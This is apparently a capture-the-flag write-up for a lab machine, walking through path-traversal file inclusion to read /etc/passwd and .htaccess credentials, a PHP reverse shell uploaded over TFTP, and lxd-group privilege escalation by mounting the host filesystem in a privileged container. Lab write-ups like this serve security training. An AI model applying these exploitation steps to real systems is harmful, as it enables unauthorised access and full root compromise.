Included

Personal Rating: Easy

Enumeration

Running an initial nmap scan:

sudo nmap <IP>

80/tcp open  http 
68/udp open|filtered dhcpc 
69/udp open|filtered tftp

http://10.129.174.35/?file=home.php10.129.174.35

PHP Path Traversal

I quickly found an LFI approach

Local File Inclusion (LFI) — Web Application Penetration TestingMedium

/script.php?page=../../../../../../etc/passwd

root:x:0:O:root:/root:/bin/bash
<SNIP>
mike:x: 1000: 1000:mike:/home/mike:/bin/bash
tftp:x:110:113:

So the first user seems to be 'mike'.

Since we have the tftp user and the port 69 open, I searched for the tftp default folder, which is /var/lib/tftpboot.

I tried some command executions using php wrappers with the LFI, but that didn't work.

Initial Access

I found mike's credentials in the file '.htaccess'.

Through the LFI I also found out that the user is a member of the lxd group, which opens up this privilege escalation path:

But first I have to get a shell. I uploaded a webshell using the tftp share:

Tftp 10.129.95.185 
> put php-reverse-shell.php 

I fetched the shell an upgraded it to a fully interactive one:

python3 –c 'import pty; pty.spawn("/bin/bash")'

LXD Group Abuse to root

I then used the tftp port to transfer an alpine linux container on to the host to exploit the lxd group.

Lxc init
Lxc import container –alias privesc 
Lxc image list 
Lxc init privesc privesc-container –c security.privileged=true //by default lxc spawns unprivileged containers and does UID mapping. With the option, UID 0 in the container is mapped to UID 0 on the host (root) 
Lxc config device add privesc-container mydevice disk source=/ path=/mnt/root recursive=true 
Lxc start privesc-container && lxc list
Lxc exec privesc-container /bin/sh

#    cat /mnt/root/root/root.txt